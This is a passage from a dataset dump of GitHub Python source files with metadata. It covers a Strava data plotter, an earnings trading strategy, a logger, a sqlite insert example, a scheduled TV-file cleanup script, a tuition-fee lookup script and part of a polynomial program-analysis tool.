distance (histogram)\n axs[0].hist(df[\"distance_km\"], bins=\"auto\",\n color=\"#FC4C02\", edgecolor=\"white\")\n axs[0].set_xlabel(\"距離 (km) [Distance]\")\n axs[0].set_ylabel(\"頻度 [Frequency]\")\n axs[0].set_title(\"距離の分布 [Distribution of Distance]\")\n axs[0].yaxis.set_major_locator(MaxNLocator(integer=True))\n axs[0].grid(True, axis=\"y\", linestyle=\"--\")\n\n # duration (histogram)\n axs[1].hist(df[\"duration_min\"], bins=\"auto\",\n color=\"#AB68FF\", edgecolor=\"white\")\n axs[1].set_xlabel(\"時間 (min) [Duration]\")\n axs[1].set_ylabel(\"頻度 [Frequency]\")\n axs[1].set_title(\"時間の分布 [Distribution of Duration]\")\n axs[1].yaxis.set_major_locator(MaxNLocator(integer=True))\n axs[1].grid(True, axis=\"y\", linestyle=\"--\")\n\n # alitude_gains (histogram)\n axs[2].hist(df[\"altitude_gains_m\"], bins=\"auto\",\n color=\"#617A55\", edgecolor=\"white\")\n axs[2].set_xlabel(\"獲得標高 (m) [Altitude Gains]\")\n axs[2].set_ylabel(\"頻度 [Frequency]\")\n axs[2].set_title(\"獲得標高の分布 [Distribution of Altitude Gains]\")\n axs[2].yaxis.set_major_locator(MaxNLocator(integer=True))\n axs[2].grid(True, axis=\"y\", linestyle=\"--\")\n\n fig.tight_layout()\n\n return fig\n\n\ndef plot_weather_data(df: pd.DataFrame) -> matplotlib.figure.Figure:\n fig, axs = plt.subplots(2, 2, figsize=[12, 10])\n\n # Check if 'temperature_c' column is all NaN\n if df[\"temperature_c\"].isnull().all():\n plt.suptitle(\n \"get_weather_data.pyを実行してください。\\nPlease run get_weather_data.py.\")\n # If all values are NaN, return the empty plot\n return fig\n\n scatter0 = axs[0, 0].scatter(\n df[\"average_pace_min_km\"],\n df[\"temperature_c\"],\n c=df[\"humidity_pct\"],\n cmap=\"Blues\",\n )\n axs[0, 0].set_xlabel(\"ペース (min/km) [Pace]\")\n axs[0, 0].set_ylabel(\"気温 (℃) [Temperature]\")\n axs[0, 0].grid(True, linewidth=0.75)\n axs[0, 0].invert_xaxis()\n cbar0 = fig.colorbar(scatter0, ax=axs[0, 0])\n cbar0.set_label(\"湿度 (%) [Humidity]\")\n\n scatter1 = axs[0, 1].scatter(\n df[\"distance_km\"],\n df[\"temperature_c\"],\n c=df[\"humidity_pct\"],\n cmap=\"Blues\",\n )\n axs[0, 1].set_xlabel(\"距離 (km) [Distance]\")\n axs[0, 1].set_ylabel(\"気温 (℃) [Temperature]\")\n axs[0, 1].grid(True, linewidth=0.75)\n cbar1 = fig.colorbar(scatter1, ax=axs[0, 1])\n cbar1.set_label(\"湿度 (%) [Humidity]\")\n\n scatter2 = axs[1, 0].scatter(\n df[\"average_pace_min_km\"],\n df[\"humidity_pct\"],\n c=df[\"temperature_c\"],\n cmap=\"Reds\",\n )\n axs[1, 0].set_xlabel(\"ペース (min/km) [Pace]\")\n axs[1, 0].set_ylabel(\"湿度 (%) [Humidity]\")\n axs[1, 0].grid(True, linewidth=0.75)\n axs[1, 0].invert_xaxis()\n cbar2 = fig.colorbar(scatter2, ax=axs[1, 0])\n cbar2.set_label(\"気温 (℃) [Temperature]\")\n\n scatter3 = axs[1, 1].scatter(\n df[\"average_pace_min_km\"],\n df[\"air_pressure_hpa\"],\n c=df[\"temperature_c\"],\n cmap=\"Reds\",\n )\n axs[1, 1].set_xlabel(\"ペース (min/km) [Pace]\")\n axs[1, 1].set_ylabel(\"気圧 (hPa) [Air Pressure]\")\n axs[1, 1].grid(True, linewidth=0.75)\n axs[1, 1].invert_xaxis()\n cbar3 = fig.colorbar(scatter3, ax=axs[1, 1])\n cbar3.set_label(\"気温 (℃) [Temperature]\")\n\n fig.tight_layout()\n\n return fig\n\n\nif __name__ == \"__main__\":\n try:\n df = pd.read_csv(\"strava_data.csv\")\n except FileNotFoundError:\n print(\"strava_data.csvが見つかりません。get_strava_data.pyを実行してください。\")\n print(\"strava_data.csv not found. Please run get_strava_data.py.\")\n sys.exit(1)\n df = preprocess_df(df, activity_type=\"Run\")\n fig1 = plot_basic_stat_from_df(df)\n fig2 = plot_detailed_stat_from_df(df)\n fig3 = scatter_plots_from_df(df)\n fig4 = scatter_3d_plot_from_df(df)\n fig5 = plot_pie_chart_from_df(df)\n fig6 = plot_histograms_from_df(df)\n fig7 = plot_weather_data(df)\n\n plt.show()\n\n # Save figures\n if not os.path.exists(\"images\"):\n os.makedirs(\"images\")\n fig1.savefig(\"images/basic_stat.png\", dpi=SAVE_FIG_DPI)\n fig2.savefig(\"images/detailed_stat.png\", dpi=SAVE_FIG_DPI)\n fig3.savefig(\"images/scatter_plots.png\", dpi=SAVE_FIG_DPI)\n fig4.savefig(\"images/scatter_3d_plot.png\", dpi=SAVE_FIG_DPI)\n fig5.savefig(\"images/pie_chart.png\", dpi=SAVE_FIG_DPI)\n fig6.savefig(\"images/histograms.png\", dpi=SAVE_FIG_DPI)\n fig7.savefig(\"images/weather_data.png\", dpi=SAVE_FIG_DPI)\n\n\n# TODO: Plot data based on different activities (running, climbing, etc.) in different colors and legends\n# TODO: Analyze data with different metrics (e.g. time, location, weather, temperature, etc.)\n# TODO: With machine learning, identify correlation between different metrics and predict future performance (e.g. speed, distance, etc.) with data from the past and new data (e.g. food intake, sleep, mood, weather, temperature, etc.)\n", "repo_name": "KORINZ/strava-data-visualization-tool", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 19347, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.rcParams", "line_number": 26, "usage_type": "attribute"}, {"api_name": "utility.load_matplotlib_local_fonts", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 33, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.polyfit", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.poly1d", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 69, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 64, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.poly1d", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 75, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.rcParams", "line_number": 94, "usage_type": "attribute"}, {"api_name": "numpy.maximum", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FuncFormatter", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 75, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 121, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FuncFormatter", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.to_timedelta", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 121, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 205, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 213, "usage_type": "call"}, {"api_name": "pandas.to_timedelta", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 248, "usage_type": "call"}, {"api_name": "pandas.to_timedelta", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.dates.DateFormatter", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 205, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 277, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 277, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 277, "usage_type": "name"}, {"api_name": "typing.Literal", "line_number": 308, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 318, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 333, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 333, "usage_type": "name"}, {"api_name": "calendar.day_name", "line_number": 368, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 404, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 404, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 318, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 408, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 411, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 411, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 419, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 428, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 437, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 408, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 408, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 445, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 446, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 446, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 450, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 450, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 445, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 445, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 513, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 517, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 527, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 527, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 530, "usage_type": "call"}, {"api_name": "os.path", "line_number": 530, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 531, "usage_type": "call"}]} +{"seq_id": "29632207623", "text": "from typing import List\nimport pandas as pd\n\nfrom ..strategies import base_strategy\nfrom tadawol import stats\nfrom tadawol import earnings\nfrom math import inf\n\n\nclass Earnings(base_strategy.BaseStrategy):\n\n def __init__(\n self,\n short_window: int = 5,\n long_window: int = 50,\n max_lose_percent: int = 8,\n max_win_percent: int = 15,\n max_keep_days: int = 15\n ):\n super().__init__(\n max_lose_percent=max_lose_percent,\n max_win_percent=max_win_percent,\n max_keep_days=max_keep_days,\n )\n\n self.short_window = short_window\n self.long_window = long_window\n\n earnings.update_data()\n self.earnings_df = earnings.get_earnings_df()\n self.earnings_df.rename(columns={\"ticker\": \"Ticker\"}, inplace=True)\n\n self.name = \"Earnings\"\n\n def add_entries_for_ticker(self, ticker_data: pd.DataFrame, **kwargs):\n ticker_data = ticker_data.copy(deep=True)\n ticker_data.sort_values(by=\"Date\", ascending=True, inplace=True)\n ticker_data.reset_index(drop=True, inplace=True)\n assert ticker_data[\"Ticker\"].nunique() == 1\n\n # get ticker earnings\n df, long_window_ema_column = stats.add_ema(ticker_data, window=self.long_window)\n df, short_window_ema_column = stats.add_ema(df, window=self.short_window)\n\n df.loc[:, \"long_ema_evolution\"] = df[long_window_ema_column] - df[long_window_ema_column].shift(1)\n df.loc[:, \"short_ema_evolution\"] = df[short_window_ema_column] - df[short_window_ema_column].shift(1)\n\n ticker = ticker_data[\"Ticker\"].unique()[0]\n ticker_earnings = self.earnings_df[self.earnings_df[\"Ticker\"] == ticker]\n df = pd.merge(df, ticker_earnings, on=[\"Date\", \"Ticker\"], how=\"left\")\n df.sort_values(by=\"Date\", ascending=True, inplace=True)\n for i in range(1, 4):\n df.loc[:, f\"earnings_{i}\"] = df[\"epssurprisepct\"].shift(i)\n\n def last_surprise(row):\n for i in range(1, 4):\n last_surprise = row[f\"earnings_{i}\"]\n if not pd.isna(last_surprise):\n return last_surprise\n\n return -inf\n\n df.loc[:, \"last_surprise\"] = df.apply(last_surprise, axis=1)\n\n df.loc[:, \"entry\"] = (df[\"short_ema_evolution\"] > 0) & (df[\"last_surprise\"] > 0)\n\n # go-on condition\n df.loc[:, \"good_evolution\"] = df[\"short_ema_evolution\"] > 0\n df.loc[:, \"go-on\"] = df[\"good_evolution\"] | df[\"good_evolution\"].shift(1) | df[\"good_evolution\"].shift(2) | df[\n \"good_evolution\"].shift(3) | df[\"good_evolution\"].shift(4) | df[\"good_evolution\"].shift(5)\n return df\n\n @staticmethod\n def get_grid():\n return [\n [9, 12, 15],\n [22, 26, 30],\n [9, 6],\n [8],\n [15],\n [7, 10, 15]\n ]\n\n @staticmethod\n def get_hint_columns() -> List[str]:\n return []\n", "repo_name": "yassineameur/tadawol", "sub_path": "tadawol/strategies/earnings.py", "file_name": "earnings.py", "file_ext": "py", "file_size_in_byte": 2985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "strategies.base_strategy.BaseStrategy", "line_number": 10, "usage_type": "attribute"}, {"api_name": "strategies.base_strategy", "line_number": 10, "usage_type": "name"}, {"api_name": "tadawol.earnings.update_data", "line_number": 29, "usage_type": "call"}, {"api_name": "tadawol.earnings", "line_number": 29, "usage_type": "name"}, {"api_name": "tadawol.earnings.get_earnings_df", "line_number": 30, "usage_type": "call"}, {"api_name": "tadawol.earnings", "line_number": 30, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tadawol.stats.add_ema", "line_number": 42, "usage_type": "call"}, {"api_name": "tadawol.stats", "line_number": 42, "usage_type": "name"}, {"api_name": "tadawol.stats.add_ema", "line_number": 43, "usage_type": "call"}, {"api_name": "tadawol.stats", "line_number": 43, "usage_type": "name"}, {"api_name": "pandas.merge", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.isna", "line_number": 58, "usage_type": "call"}, {"api_name": "math.inf", "line_number": 61, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 85, "usage_type": "name"}]} +{"seq_id": "18486407831", "text": "#This is the most efficient way to put in values into a database!\n\n\nimport sqlite3 \n\nconn = sqlite3.connect(\"new.db\")\n\nwith conn as connection :\n\tc = connection.cursor()\n\tcities = [\n\t('Boston', 'MA', 600000),\n\t('Chicago', 'IL', 2700000),\n\t('Houston', 'TX', 2100000),\n\t]\n\n\tc.executemany('INSERT INTO population VALUES(?, ?, ?)', cities)", "repo_name": "CatGod6/pythoncosc", "sub_path": "sqlc.py", "file_name": "sqlc.py", "file_ext": "py", "file_size_in_byte": 335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlite3.connect", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "10224971354", "text": "import logging\n\nfrom config import Config\n\n\nclass Logger(logging.Logger):\n \"\"\"\n Logger class\n Specifies handlers and format\n \"\"\"\n LOGGER_FORMAT = \"%(asctime)s\\t%(levelname)-7s\\t%(name)-12s\\t%(message)s\"\n\n def __init__(self, name):\n super().__init__(name)\n self.add_c_handler()\n self.add_f_handler()\n\n def add_c_handler(self) -> None:\n \"\"\"\n Adds stdout handler\n\n :return: None\n \"\"\"\n handler = logging.StreamHandler()\n handler.setLevel(Config.LOGGING_COMMAND_LINE_LEVEL)\n formatter = logging.Formatter(self.LOGGER_FORMAT)\n handler.setFormatter(formatter)\n self.addHandler(handler)\n\n def add_f_handler(self) -> None:\n \"\"\"\n Adds file handler\n\n :return: None\n \"\"\"\n handler = logging.FileHandler(Config.LOGGING_FILE)\n handler.setLevel(Config.LOGGING_FILE_LEVEL)\n formatter = logging.Formatter(self.LOGGER_FORMAT)\n handler.setFormatter(formatter)\n self.addHandler(handler)\n", "repo_name": "Denis-Source/file_backup", "sub_path": "logger.py", "file_name": "logger.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.Logger", "line_number": 6, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 24, "usage_type": "call"}, {"api_name": "config.Config.LOGGING_COMMAND_LINE_LEVEL", "line_number": 25, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 25, "usage_type": "name"}, {"api_name": "logging.Formatter", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 36, "usage_type": "call"}, {"api_name": "config.Config.LOGGING_FILE", "line_number": 36, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 36, "usage_type": "name"}, {"api_name": "config.Config.LOGGING_FILE_LEVEL", "line_number": 37, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 37, "usage_type": "name"}, {"api_name": "logging.Formatter", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "72281644674", "text": "import os\nimport time\nimport sys\nimport logging\nimport pycron\n\n########################################################################\n\npath = os.environ['TV_PATH']\nshowList = os.environ['CONF']\nlogfile = os.environ['LOG']\nexclude = os.environ['EXCLUDE'].split(',')\ncron = os.environ['CRON']\nuid = int(os.environ['PUID'])\ngid = int(os.environ['PGID'])\n\n############################# End Variables ############################\n\n\ndef main():\n logging.info(\"************Begin TV Cleanup************\")\n inFile = open(showList)\n for line in inFile:\n line = line.rstrip('\\n')\n token = line.split(\",\")\n cleanup(int(token[0]), os.path.join(path, token[1]))\n inFile.close()\n logging.info(\"*************End TV Cleanup*************\")\n\n#-----------------------------------------------------------------------\ndef clean(cleanPath, cleanItem):\n if os.path.isdir(cleanPath):\n try:\n os.rmdir(cleanPath)\n logging.info(\"Removed directory: \" + cleanPath)\n except OSError:\n logging.error(\"Unable to remove directory: \" + cleanPath)\n else:\n if not cleanPath.endswith(tuple(exclude)):\n try:\n if os.path.exists(cleanPath):\n os.remove(cleanPath)\n logging.info(\"Removed show: \" + cleanItem)\n except OSError:\n logging.error(\"Unable to remove show: \" + cleanItem)\n#-----------------------------------------------------------------------\ndef cleanup(numDays, cleanPath):\n numSecs = time.time() - (numDays * 24 * 60 * 60)\n for root, dirs, files in os.walk(cleanPath):\n for name in files:\n filename = os.path.join(root, name)\n \n if os.stat(filename).st_mtime < numSecs:\n clean(filename, name)\n if not os.listdir(root):\n clean(root, name)\n#-----------------------------------------------------------------------\n\n# Setup app\nos.chdir(path)\ntime.tzset()\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s:%(levelname)s:%(message)s')\nlogging.info(\"Starting TVcleanup with cron \" + cron)\n\nos.setgid(gid)\nos.setuid(uid)\n\nlogging.info(\"Using user ID: \" + str(os.getuid()) + \", and group ID: \" + str(os.getgid()))\n\nwhile True:\n if pycron.is_now(cron):\n main()\n time.sleep(60)\n else:\n time.sleep(60)\n", "repo_name": "FlexibleToast/tvcleanup", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2204, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.rmdir", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 43, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 45, "usage_type": "call"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 53, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 55, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 60, "usage_type": "call"}, {"api_name": "time.tzset", "line_number": 61, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 62, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 62, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 63, "usage_type": "call"}, {"api_name": "os.setgid", "line_number": 65, "usage_type": "call"}, {"api_name": "os.setuid", "line_number": 66, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 68, "usage_type": "call"}, {"api_name": "os.getuid", "line_number": 68, "usage_type": "call"}, {"api_name": "os.getgid", "line_number": 68, "usage_type": "call"}, {"api_name": "pycron.is_now", "line_number": 71, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "32509076608", "text": "import requests\nfrom bs4 import BeautifulSoup \nfrom urllib import request\n\nquery = input(\"Enter Uni: \")\nquery = query.replace(\" \",\"+\")\nquery = \"https://search.prtl.co/2018-07-23/?q=en-283%7Ckw-\" + query + \"%7Clv-master%7Cmh-face2face%7Ctc-EUR\" \n\n#r = request.urlopen(query)\n\nr = requests.get(query)\nfee = r.json()[0][\"tuition_fee\"]\nfeeval= fee[\"value\"]\nfeefreq = fee[\"unit\"]\nfeecurr = fee[\"currency\"]\n\nprint(str(feeval) + \" \" + feecurr + \" / \" + feefreq)\n", "repo_name": "55abhilash/uniparser", "sub_path": "getfee.py", "file_name": "getfee.py", "file_ext": "py", "file_size_in_byte": 455, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "42198233274", "text": "import copy\nimport sympy as sp\nfrom polynomial import Polynomial\nimport sys\nimport copy\nfrom sympy.matrices import Matrix\nimport time\nimport os\nfrom collections import deque\n\nall_unknown_coefficients = []\nunknown_coefficients_index = 0\n\n\ndef get_symbolic_poly(symbolic_poly, real_vars):\n global all_unknown_coefficients, unknown_coefficients_index\n if len(symbolic_poly.children) == 2:\n variables = get_vars_name(symbolic_poly.children[0])\n degree = int(symbolic_poly.children[1].children[0].value)\n else:\n variables = []\n degree = int(symbolic_poly.children[0].children[0].value)\n\n # check all variables are in real_vars\n sympy_vars = []\n for var in variables:\n if var not in real_vars:\n raise Exception(\n \"Undefined variable used in symbolic_poly:\" + str(symbolic_poly))\n sympy_vars.append(real_vars[var])\n\n # sympy_vars = list(map(lambda x: real_vars[x], variables))\n curr_monomial_list = [sp_unit]\n all_monomials = set([sp_unit])\n # sympy_vars = list(map(lambda x: real_vars[x], variables))\n curr_degree = 1\n while curr_degree <= degree:\n new_monomial_list = list()\n for var in sympy_vars:\n for monomial in curr_monomial_list:\n new_monomial_list.append(monomial*var)\n all_monomials = all_monomials.union(set(new_monomial_list))\n curr_monomial_list = new_monomial_list\n curr_degree += 1\n\n monomial_vector = list(all_monomials)\n monomial_dict = {}\n coefficient_list = []\n # create the monomial_dict for the Polynomial\n for mono in monomial_vector:\n unknown_coefficient_name = \"_a_\" + \\\n str(unknown_coefficients_index) + \"_\"\n sym = sp.Symbol(unknown_coefficient_name)\n unknown_coefficients_index += 1\n coefficient_list.append(sym)\n monomial_dict[mono] = sym\n\n all_unknown_coefficients.extend(coefficient_list)\n polynomial = Polynomial(monomial_dict)\n return polynomial, polynomial.to_string()\n\n\ndef apply_substitute(lst, substitute_dict):\n return list(map(lambda x: x.subs_complex(substitute_dict), lst))\n\n\ndef get_bound_poly(real_vars, bound):\n sp_bound = Polynomial({sp_unit: bound})\n monomial_dict = {}\n count = 0\n for x in real_vars:\n var = real_vars[x]\n monomial_dict[var*var] = 1\n count += 1\n poly = Polynomial(monomial_dict)\n p_count = Polynomial({sp_unit: count})\n\n return (sp_bound*sp_bound*p_count - poly)\n\n\ndef get_substition_dict(real_vars, variables_index):\n substitute_dict = {}\n for var in variables_index:\n var_name = var + \"_\" + str(variables_index[var])\n if var_name not in real_vars:\n real_vars[var_name] = sp.Symbol(var_name)\n substitute_dict[var] = real_vars[var_name]\n return substitute_dict\n\n\ndef get_negation(lst_poly_geq):\n # we overapproximate negation\n return list(map(lambda x: x*Polynomial({sp_unit: -1}), lst_poly_geq))\n\n\ndef graph_preprocessor(tree, file_name):\n \"\"\"\n The function takes a program tree as input and returns the symbolic\n \"\"\"\n global real_vars, function_vars\n declarations = tree.children[0]\n precond = tree.children[1]\n stmts = tree.children[2]\n postcond = tree.children[3].children[0]\n # to store each line of the symbolic polynomial program\n symbolic_polynomial_program = []\n\n # get variable list\n real_vars, function_vars = get_declarations(\n declarations, symbolic_polynomial_program)\n variables_index = {x: 0 for x in real_vars}\n\n if len(precond.children) == 0:\n _preconditions, precondition_line = [Polynomial({sp_unit: 1})], \"\"\n else:\n # it is a list, we only store the lhs of the inequalities, rhs is >= 0 by default\n _preconditions, precondition_line = get_assertion(precond, real_vars)\n symbolic_polynomial_program.append(\"@pre({});\".format(precondition_line))\n\n graph = PolynomialTS(real_vars, file_name)\n root = graph.add_vertex(text=precondition_line)\n graph.set_initial_loc(root, _preconditions)\n # Handle Statements\n parent_vertex = root\n for statement in stmts.children:\n parent_vertex = add_statement_for_graph(\n graph, parent_vertex, statement, symbolic_polynomial_program)\n # Handle Postcondition\n _postconditions, postconditions_line = get_assertion(postcond, real_vars)\n\n terminal = graph.add_vertex(text=postconditions_line)\n graph.add_edge(parent_vertex, terminal, [], [])\n graph.set_final_loc(terminal, _postconditions)\n symbolic_polynomial_program.append(\n \"@post({});\".format(postconditions_line))\n # we will add a compact polynomial inequality when we apply stellensatze (if required)\n return graph, symbolic_polynomial_program, all_unknown_coefficients\n\n\nclass PolynomialTS:\n def __init__(self, variables_dict, file_name, var_manager):\n # maps each variable name type(str) to the sp_symbol\n self.variables = variables_dict\n self.var_manager = var_manager\n self.vertices = set()\n self.vertex_text = dict()\n self.edges = dict()\n # list v's such that every cycle passses through at least one v from cutset\n self.cutset = set()\n # v -> list of P(V) such that P(V) \\geq 0 whenever control reaches v\n self.invariants = dict()\n self.pre_conditions = dict()\n self.counter = 0\n self.file_name = file_name\n\n def add_vertex(self, text=\"\"):\n v = self.counter\n self.counter += 1\n self.vertices.add(v)\n self.vertex_text[v] = text\n return v\n\n def add_edge(self, v1, v2, update, guard, text=\"\"):\n # update = (var, P(V)) for var = P(V) (P(V) is Polynomial type) or None if no update\n # guard = P(V) which stands for P(V) \\geq 0\n if len(update) != 2 and len(update) != 0:\n raise Exception(\"Invalid update provided: \", update, len(update))\n if v1 not in self.vertices or v2 not in self.vertices:\n raise Exception(\n \"Invalid vertex provided for edge: {} - {}\".format(v1, v2))\n if (v1, v2) in self.edges:\n raise Exception(\"Edge already exists\")\n self.edges[(v1, v2)] = (update, guard, text)\n\n def add_cutset(self, v, invariant, pre_condition=[]):\n if v not in self.vertices:\n raise Exception(\"Vertex {} does not exists.\".format(v))\n self.cutset.add(v)\n self.invariants[v] = invariant\n self.pre_conditions[v] = pre_condition\n\n def set_initial_loc(self, v, 